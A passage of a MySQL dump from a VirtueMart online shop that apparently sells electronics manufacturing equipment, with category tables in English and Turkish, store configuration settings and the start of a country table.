00:00:00',0),(19,0,1,'','default','default','1','0',0,0,'show_store_desc=\"\"|showcategory_desc=\"\"|showcategory=\"\"|categories_per_row=\"\"|showproducts=\"\"|omitLoaded=\"\"|showsearch=\"\"|productsublayout=\"\"|featured=\"\"|featured_rows=\"\"|omitLoaded_featured=\"\"|discontinued=\"\"|discontinued_rows=\"\"|omitLoaded_discontinued=\"\"|latest=\"\"|latest_rows=\"\"|omitLoaded_latest=\"\"|topten=\"\"|topten_rows=\"\"|omitLoaded_topten=\"\"|recent=\"\"|recent_rows=\"\"|omitLoaded_recent=\"\"|','','',1,0,0,0,1,'2020-02-11 09:33:53',676,'2020-02-11 13:14:25',676,'0000-00-00 00:00:00',0),(20,0,1,'','default','default','1','0',0,0,'show_store_desc=\"\"|showcategory_desc=\"\"|showcategory=\"\"|categories_per_row=\"\"|showproducts=\"\"|omitLoaded=\"\"|showsearch=\"\"|productsublayout=\"\"|featured=\"\"|featured_rows=\"\"|omitLoaded_featured=\"\"|discontinued=\"\"|discontinued_rows=\"\"|omitLoaded_discontinued=\"\"|latest=\"\"|latest_rows=\"\"|omitLoaded_latest=\"\"|topten=\"\"|topten_rows=\"\"|omitLoaded_topten=\"\"|recent=\"\"|recent_rows=\"\"|omitLoaded_recent=\"\"|','','',1,0,0,0,1,'2020-02-11 12:19:21',676,'2020-02-11 13:34:49',676,'0000-00-00 00:00:00',0);
/*!40000 ALTER TABLE `fz6t4_virtuemart_categories` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_categories_en_gb`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_categories_en_gb`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_categories_en_gb` (
  `virtuemart_category_id` int unsigned NOT NULL,
  `category_name` varchar(180) NOT NULL DEFAULT '',
  `category_description` varchar(19000) NOT NULL DEFAULT '',
  `metadesc` varchar(400) NOT NULL DEFAULT '',
  `metakey` varchar(400) NOT NULL DEFAULT '',
  `customtitle` varchar(255) NOT NULL DEFAULT '',
  `slug` varchar(192) NOT NULL DEFAULT '',
  PRIMARY KEY (`virtuemart_category_id`),
  UNIQUE KEY `slug` (`slug`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_categories_en_gb`
--

LOCK TABLES `fz6t4_virtuemart_categories_en_gb` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_categories_en_gb` DISABLE KEYS */;
INSERT INTO `fz6t4_virtuemart_categories_en_gb` VALUES (2,'SMD','','','','','smd-düşük-hızlı'),(3,'SMD (Mid-Speed)','','','','','smd-orta-hızlı'),(4,'SMD (Ultra-Speed)','','','','','smd-ultra-hız'),(5,'Screen Printer','','','','','screen-printer'),(6,'SMD Reflow','','','','','smd-fırın'),(7,'Through-Hole','','','','','thru-hole'),(8,'Wave Soldering','','','','','dalga-lehim'),(9,'Selective Soldering','','','','','bölgesel-lehimleme'),(10,'Cleaning Machines','','','','','temizleme-makineleri'),(11,'Conveyors','','','','','konveyorler'),(12,'Soldering Material','','','','','lehimleme-malzemeleri'),(13,'Second Hand M/C','','','','','2.-el-makineler'),(14,'Solder Wire','','','','','tel-lehim'),(15,'Solder Bar','','','','','çubuk-lehim'),(16,'Flux','','','','','flux'),(17,'Solder Paste','','','','','krem-lehim'),(18,'CNC','','','','','cnc'),(19,'Laser Marking Machine','','','','','laser-marking-machine'),(20,'Odd-Shape Insertion','','','','','odd-shape-inserter');
/*!40000 ALTER TABLE `fz6t4_virtuemart_categories_en_gb` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_categories_tr_tr`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_categories_tr_tr`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_categories_tr_tr` (
  `virtuemart_category_id` int unsigned NOT NULL,
  `category_name` varchar(180) NOT NULL DEFAULT '',
  `category_description` varchar(19000) NOT NULL DEFAULT '',
  `metadesc` varchar(400) NOT NULL DEFAULT '',
  `metakey` varchar(400) NOT NULL DEFAULT '',
  `customtitle` varchar(255) NOT NULL DEFAULT '',
  `slug` varchar(192) NOT NULL DEFAULT '',
  PRIMARY KEY (`virtuemart_category_id`),
  UNIQUE KEY `slug` (`slug`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_categories_tr_tr`
--

LOCK TABLES `fz6t4_virtuemart_categories_tr_tr` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_categories_tr_tr` DISABLE KEYS */;
INSERT INTO `fz6t4_virtuemart_categories_tr_tr` VALUES (2,'SMD ','','','SMD Dizgi, Düşük hızlı dizgi, numune dizgi, pilot dizgi','','smd-düşük-hızlı'),(3,'SMD (Orta Hızlı)','','','SMD Dizgi, Orta hızlı SMD Dizgi, Orta hızlı dizgi','','smd-orta-hızlı'),(4,'SMD (Ultra-Hız)','','','SMD Dizgi makinesi, Ultra hızlı SMD Dizgi, Yüksek Hızlı Dizgi','','smd-ultra-hız'),(5,'Screen Printer','','','Screen printer, Krem lehim makinesi, krem lehim baskı, baskı makinesi','','screen-printer'),(6,'SMD Fırın','','','SMD Fırın, Reflow Fırın, Elektronik fırın','','smd-fırın'),(7,'Thru-Hole','','','Aksiyel dizgi, Radyal dizgi, Bacaklı eleman dizgi, manuel dizgi','','thru-hole'),(8,'Dalga Lehim','','','Dalga lehim makinesi, pota','','dalga-lehim'),(9,'Bölgesel Lehimleme','','','selective soldering, bölgesel lehimleme','','bölgesel-lehimleme'),(10,'Temizleme Makineleri','','','PCB Temizleme, Elek Temizleme, Stencil Temizleme, PCB Yıkama, Elek Yıkama, Stencil Yıkama','','temizleme-makineleri'),(11,'Konveyorler','','','konveyorler, pcb konveyor, elektronik kart konveyoru, kart yükleme, kart boşaltma, magazin yükleme, magazin boşaltma','','konveyorler'),(12,'Lehimleme Malzemeleri','','','Lehimleme malzemeleri, krem lehim, çubuk lehim, tel lehim, flux','','lehimleme-malzemeleri'),(13,'2. El Makineler','','','kullanılmış dizgi makinesi, kullanılmış SMD makinesi, kullanılmış SMD dizgi','','2-el-makineler'),(14,'Tel Lehim','','','','','tel-lehim'),(15,'Çubuk Lehim','','','','','çubuk-lehim'),(16,'Flux','','','','','flux'),(17,'Krem Lehim','','','','','krem-lehim'),(18,'CNC','','','','','cnc'),(19,'Lazer Markalama','','','','','lazer-markalama'),(20,'Odd-form Dizgi','','','','','odd-shape-inserter');
/*!40000 ALTER TABLE `fz6t4_virtuemart_categories_tr_tr` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_category_categories`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_category_categories`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_category_categories` (
  `id` int unsigned NOT NULL AUTO_INCREMENT,
  `category_parent_id` int unsigned NOT NULL DEFAULT '0',
  `category_child_id` int unsigned NOT NULL DEFAULT '0',
  `ordering` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  UNIQUE KEY `category_parent_id` (`category_parent_id`,`category_child_id`),
  KEY `ordering` (`ordering`),
  KEY `category_child_id` (`category_child_id`)
) ENGINE=MyISAM AUTO_INCREMENT=21 DEFAULT CHARSET=utf8mb3 COMMENT='Category child-parent relation list';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_category_categories`
--

LOCK TABLES `fz6t4_virtuemart_category_categories` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_category_categories` DISABLE KEYS */;
INSERT INTO `fz6t4_virtuemart_category_categories` VALUES (2,0,2,5),(3,0,3,4),(4,0,4,3),(5,0,5,6),(6,0,6,7),(7,0,7,1),(8,0,8,8),(9,0,9,9),(10,0,10,10),(11,0,11,11),(12,0,12,13),(13,0,13,12),(14,12,14,1),(15,12,15,1),(16,12,16,2),(17,12,17,3),(18,0,18,1),(19,0,19,1),(20,0,20,1);
/*!40000 ALTER TABLE `fz6t4_virtuemart_category_categories` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_category_medias`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_category_medias`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_category_medias` (
  `id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_category_id` int unsigned NOT NULL DEFAULT '0',
  `virtuemart_media_id` int unsigned NOT NULL DEFAULT '0',
  `ordering` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  UNIQUE KEY `virtuemart_category_id` (`virtuemart_category_id`,`virtuemart_media_id`),
  KEY `ordering` (`virtuemart_category_id`,`ordering`)
) ENGINE=MyISAM AUTO_INCREMENT=25 DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_category_medias`
--

LOCK TABLES `fz6t4_virtuemart_category_medias` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_category_medias` DISABLE KEYS */;
INSERT INTO `fz6t4_virtuemart_category_medias` VALUES (23,20,115,1),(4,2,28,1),(7,5,44,1),(6,4,43,1),(8,6,45,1),(9,7,46,1),(10,8,47,1),(11,9,48,1),(12,10,49,1),(13,11,50,1),(14,12,54,1),(15,13,55,1),(16,14,75,1),(17,15,76,1),(18,16,77,1),(19,17,78,1),(20,18,96,1),(24,3,117,1),(22,19,113,1);
/*!40000 ALTER TABLE `fz6t4_virtuemart_category_medias` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_configs`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_configs`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_configs` (
  `virtuemart_config_id` tinyint unsigned NOT NULL AUTO_INCREMENT,
  `config` text,
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_config_id`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb3 COMMENT='Holds configuration settings';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_configs`
--

LOCK TABLES `fz6t4_virtuemart_configs` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_configs` DISABLE KEYS */;
INSERT INTO `fz6t4_virtuemart_configs` VALUES (1,'shop_is_offline=\"0\"|offline_message=\"Our Shop is currently down for maintenance. Please check back again soon.\"|use_as_catalog=\"0\"|currency_converter_module=\"convertECB.php\"|order_mail_html=\"1\"|dateformat=\"%m\\/%d\\/%y\"|useSSL=\"0\"|dangeroustools=0|debug_enable=\"admin\"|google_jquery=\"1\"|multix=\"none\"|pdf_button_enable=\"1\"|show_emailfriend=\"0\"|show_printicon=\"1\"|show_out_of_stock_products=\"1\"|coupons_enable=\"0\"|show_uncat_child_products=\"0\"|coupons_default_expire=\"1,D\"|weight_unit_default=\"KG\"|lwh_unit_default=\"M\"|list_limit=\"10\"|showReviewFor=\"none\"|reviewMode=\"none\"|showRatingFor=\"none\"|ratingMode=\"bought\"|reviews_autopublish=\"0\"|reviews_minimum_comment_length=\"0\"|reviews_maximum_comment_length=\"2000\"|vmtemplate=\"\"|categorytemplate=\"\"|showCategory=\"1\"|categorylayout=\"categories\"|categories_per_row=\"2\"|productlayout=\"default\"|products_per_row=\"3\"|vmlayout=\"\"|show_featured=\"1\"|featured_products_per_row=\"3\"|show_topTen=\"1\"|topten_products_per_row=\"3\"|show_recent=\"1\"|show_latest=\"1\"|assets_general_path=\"components\\/com_virtuemart\\/assets\\/\"|media_category_path=\"images\\/stories\\/virtuemart\\/category\\/\"|media_product_path=\"images\\/stories\\/virtuemart\\/product\\/\"|media_manufacturer_path=\"images\\/stories\\/virtuemart\\/manufacturer\\/\"|media_vendor_path=\"images\\/stories\\/virtuemart\\/vendor\\/\"|forSale_path_thumb=\"images\\/stories\\/virtuemart\\/forSale\\/resized\\/\"|img_resize_enable=\"1\"|img_width=\"300\"|img_height=\"300\"|no_image_set=\"noimage.gif\"|no_image_found=\"warning.png\"|browse_orderby_field=\"pc.ordering\"|browse_orderby_fields=[\"product_name\",\"`p`.product_sku\",\"category_name\",\"mf_name\",\"pc.ordering\"]|browse_search_fields=[\"product_name\",\"`p`.product_sku\",\"product_s_desc\",\"product_desc\",\"category_name\",\"category_description\",\"mf_name\"]|show_prices=\"1\"|price_show_packaging_pricelabel=\"0\"|show_tax=\"1\"|basePrice=\"0\"|basePriceText=\"0\"|basePriceRounding=\"-1\"|variantModification=\"0\"|variantModificationText=\"0\"|variantModificationRounding=\"-1\"|basePriceVariant=\"0\"|basePriceVariantText=\"0\"|basePriceVariantRounding=\"-1\"|basePriceWithTax=\"0\"|basePriceWithTaxText=\"0\"|basePriceWithTaxRounding=\"-1\"|discountedPriceWithoutTax=\"1\"|discountedPriceWithoutTaxText=\"1\"|discountedPriceWithoutTaxRounding=\"-1\"|salesPriceWithDiscount=\"0\"|salesPriceWithDiscountText=\"0\"|salesPriceWithDiscountRounding=\"-1\"|salesPrice=\"1\"|salesPriceText=\"1\"|salesPriceRounding=\"-1\"|priceWithoutTax=\"1\"|priceWithoutTaxText=\"1\"|priceWithoutTaxRounding=\"-1\"|discountAmount=\"0\"|discountAmountText=\"0\"|discountAmountRounding=\"-1\"|taxAmount=\"0\"|taxAmountText=\"0\"|taxAmountRounding=\"-1\"|addtocart_popup=\"1\"|check_stock=\"0\"|automatic_payment=\"1\"|automatic_shipment=\"1\"|agree_to_tos_onorder=\"0\"|oncheckout_show_legal_info=\"1\"|oncheckout_show_register=\"1\"|oncheckout_show_steps=\"0\"|oncheckout_show_register_text=\"COM_VIRTUEMART_ONCHECKOUT_DEFAULT_TEXT_REGISTER\"|seo_disabled=\"0\"|seo_translate=\"0\"|seo_use_id=\"0\"|enable_content_plugin=\"1\"|reg_captcha=\"0\"|handle_404=\"1\"|member_access_number=\"\"|enableEnglish=\"1\"|vmDefLang=\"\"|active_languages=[\"en-GB\",\"tr-TR\"]|prodOnlyWLang=\"0\"|vm_lfbs=\"\"|ReInjectJLanguage=\"0\"|debug_enable_methods=\"0\"|debug_enable_router=\"0\"|revproxvar=\"\"|multixcart=\"0\"|optimisedProductSql=\"1\"|optimisedCalcSql=\"1\"|optimisedCatSql=\"1\"|useVendorEmail=\"0\"|invoiceInUserLang=\"0\"|debug_mail=\"debug_email_send\"|addVendorEmail=\"info@3s-technologies.com.tr\"|email_sf_s=[\"email\"]|email_os_s=[\"U\",\"C\",\"X\",\"R\",\"S\"]|email_os_v=[\"U\",\"C\",\"X\",\"R\"]|attach=\"\"|attach_os=[\"U\",\"C\",\"X\",\"R\"]|inv_os=[\"C\"]|norm_units=\"KG,100G,M,SM,CUBM,L,100ML,P\"|pdf_icon=\"0\"|recommend_unauth=\"1\"|ask_captcha=\"1\"|ask_question=\"1\"|asks_minimum_comment_length=\"10\"|asks_maximum_comment_length=\"2000\"|cp_rm=[\"C\"]|product_navigation=\"0\"|display_stock=\"0\"|show_pcustoms=\"1\"|show_subcat_products=\"0\"|show_uncat_parent_products=\"0\"|show_unpub_cat_products=\"1\"|cat_productdetails=\"0\"|latest_products_days=\"7\"|latest_products_orderBy=\"created_on\"|lstockmail=\"0\"|stockhandle_products=\"0\"|stockhandle=\"none\"|rised_availability=\"\"|image=\"\"|reviews_languagefilter=\"0\"|vm_num_ratings_show=\"3\"|rr_os=[\"C\"]|show_store_desc=\"1\"|showcategory_desc=\"1\"|showsearch=\"1\"|showcategory=\"1\"|showproducts=\"1\"|omitLoaded=\"1\"|show_manufacturers=\"1\"|manufacturer_per_row=\"3\"|featured=\"1\"|featured_rows=\"1\"|omitLoaded_featured=\"1\"|discontinued=\"0\"|discontinued_rows=\"1\"|omitLoaded_discontinued=\"1\"|topten=\"1\"|topten_rows=\"1\"|omitLoaded_topten=\"1\"|recent=\"1\"|recent_rows=\"1\"|omitLoaded_recent=\"1\"|latest=\"1\"|latest_rows=\"1\"|omitLoaded_latest=\"1\"|bootstrap=\"\"|cartlayout=\"default\"|productsublayout=\"\"|lazyLoad=\"1\"|useLayoutOverrides=\"1\"|usefancy=\"1\"|css=\"1\"|jquery_framework=\"1\"|jquery=\"0\"|jprice=\"1\"|jsite=\"1\"|jchosen=\"1\"|jdynupdate=\"1\"|ajax_category=\"0\"|legacylayouts=\"1\"|show_categories=\"1\"|homepage_categories_per_row=\"3\"|homepage_products_per_row=\"3\"|add_img_main=\"1\"|img_width_full=\"\"|img_height_full=\"\"|forSale_path=\"\\/home\\/ledbazaa\\/public_html\\/dmb-elektronik.com\\/vmfiles\\/\"|mediaLimit=\"20\"|llimit_init_BE=\"20\"|pagseq=\"\"|llimit_init_FE=\"20\"|pagseq_1=\"\"|pagseq_2=\"\"|pagseq_3=\"\"|pagseq_4=\"\"|pagseq_5=\"\"|vm_prices_info_tax=\"0\"|vm_prices_info_delivery=\"0\"|askprice=\"0\"|rappenrundung=\"0\"|roundindig=\"1\"|cVarswT=\"1\"|pricesbyCurrency=\"0\"|price_orderby=\"DESC\"|discountedPriceWithoutTaxTt=\"0\"|discountedPriceWithoutTaxTtText=\"0\"|discountedPriceWithoutTaxTtRounding=\"-1\"|priceWithoutTaxTt=\"0\"|priceWithoutTaxTtText=\"0\"|priceWithoutTaxTtRounding=\"-1\"|taxAmountTt=\"0\"|taxAmountTtText=\"0\"|taxAmountTtRounding=\"-1\"|salesPriceTt=\"0\"|salesPriceTtText=\"0\"|salesPriceTtRounding=\"-1\"|discountAmountTt=\"0\"|discountAmountTtText=\"0\"|discountAmountTtRounding=\"-1\"|unitPrice=\"0\"|unitPriceText=\"0\"|unitPriceRounding=\"-1\"|popup_rel=\"1\"|oncheckout_opc=\"1\"|oncheckout_ajax=\"1\"|set_automatic_shipment=\"0\"|set_automatic_payment=\"0\"|radicalShipPaymentVat=\"1\"|oncheckout_show_images=\"0\"|oncheckout_change_shopper=\"0\"|del_date_type=\"m\"|oncheckout_only_registered=\"0\"|ordertracking=\"guests\"|prd_brws_orderby_dir=\"ASC\"|browse_cat_orderby_field=\"c.ordering,category_name\"|cat_brws_orderby_dir=\"ASC\"|feed_latest_published=\"0\"|feed_latest_nb=\"5\"|feed_topten_published=\"0\"|feed_topten_nb=\"5\"|feed_featured_published=\"0\"|feed_featured_nb=\"5\"|feed_home_show_images=\"0\"|feed_home_show_prices=\"0\"|feed_home_show_description=\"0\"|feed_home_description_type=\"product_s_desc\"|feed_home_max_text_length=\"500\"|feed_cat_published=\"0\"|feed_cat_show_images=\"0\"|feed_cat_show_prices=\"0\"|feed_cat_show_description=\"0\"|feed_cat_description_type=\"product_s_desc\"|feed_cat_max_text_length=\"500\"|use_seo_suffix=\"1\"|seo_sufix=\"-detail\"|transliterateSlugs=\"0\"|seo_full=\"1\"|router_by_menu=\"0\"|sef_for_cart_links=\"1\"|task=\"apply\"|option=\"com_virtuemart\"|view=\"config\"|bb90ee5ac147b486c3a95bdc1ca7da91=\"1\"|sctime=1620761748.58814|vmlang=\"tr_tr\"','0000-00-00 00:00:00',0,'2021-05-11 19:35:59',676,'0000-00-00 00:00:00',0);
/*!40000 ALTER TABLE `fz6t4_virtuemart_configs` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_countries`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_countries`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_countries` (
  `virtuemart_country_id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_worldzone_id` tinyint(1) NOT NULL DEFAULT '1',
  `country_name` varchar(64) DEFAULT NULL,
  `country_3_code` char(3) DEFAULT NULL,
  `country_2_code` char(2) DEFAULT NULL,
  `ordering` int NOT NULL DEFAULT '0',
  `published` tinyint(1) NOT NULL DEFAULT '1',
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_country_id`),
  KEY `ordering` (`ordering`),
  KEY `published` (`published`),
  KEY `country_3_code` (`country_3_code`),
  KEY `country_2_code` (`country_2_code`),
  KEY `country_name` (`country_name`)
) ENGINE=MyISAM AUTO_INCREMENT=249 DEFAULT CHARSET=utf8mb3 COMMENT='Country records';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_countries`
--

LOCK TABLES `fz6t4_virtuemart_countries` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_countries` DISABLE KEYS */;
INSERT INTO `fz6t4_virtuemart_countries` VALUES (1,1,'Afghanistan','AFG','AF',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(2,1,'Albania','ALB','AL',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(3,1,'Algeria','DZA','DZ',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(4,1,'American Samoa','ASM','AS',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(5,1,'Andorra','AND','AD',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(6,1,'Angola','AGO','AO',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(7,1,'Anguilla','AIA','AI',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(8,1,'Antarctica','ATA','AQ',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(9,1,'Antigua and Barbuda','ATG','AG',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(10,1,'Argentina','ARG','AR',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(11,1,'Armenia','ARM','AM',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(12,1,'Aruba','ABW','AW',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(13,1,'Australia','AUS','AU',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(14,1,'Austria','AUT','AT',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(15,1,'Azerbaijan','AZE','AZ',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(16,1,'Bahamas','BHS','BS',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(17,1,'Bahrain','BHR','BH',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(18,1,'Bangladesh','BGD','BD',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(19,1,'Barbados','BRB','BB',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(20,1,'Belarus','BLR','BY',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(21,1,'Belgium','BEL','BE',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(22,1,'Belize','BLZ','BZ',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(23,1,'Benin','BEN','BJ',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(24,1,'Bermuda','BMU','BM',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(25,1,'Bhutan','BTN','BT',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(26,1,'Bolivia','BOL','BO',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(27,1,'Bosnia and Herzegowina','BIH','BA',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(28,1,'Botswana','BWA','BW',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(29,1,'Bouvet Island','BVT','BV',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(30,1,'Brazil','BRA','BR',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(31,1,'British Indian Ocean Territory','IOT','IO',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(32,1,'Brunei Darussalam','BRN','BN',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(33,1,'Bulgaria','BGR','BG',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(34,1,'Burkina Faso','BFA','BF',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(35,1,'Burundi','BDI','BI',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(36,1,'Cambodia','KHM','KH',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(37,1,'Cameroon','CMR','CM',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(38,1,'Canada','CAN','CA',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(39,1,'Cape Verde','CPV','CV',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(40,1,'Cayman Islands','CYM','KY',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(41,1,'Central African Republic','CAF','CF',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(42,1,'Chad','TCD','TD',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(43,1,'Chile','CHL','CL',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(44,1,'China','CHN','CN',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(45,1,'Christmas Island','CXR','CX',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(46,1,'Cocos (Keeling) Islands','CCK','CC',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(47,1,'Colombia','COL','CO',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(48,1,'Comoros','COM','KM',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(49,1,'Congo','COG','CG',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(50,1,'Cook Islands','COK','CK',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(51,1,'Costa Rica','CRI','CR',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(52,1,'Cote D\'Ivoire','CIV','CI',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(53,1,'Croatia','HRV','HR',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(54,1,'Cuba','CUB','CU',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(55,1,'Cyprus','CYP','CY',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(56,1,'Czech Republic','CZE','CZ',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 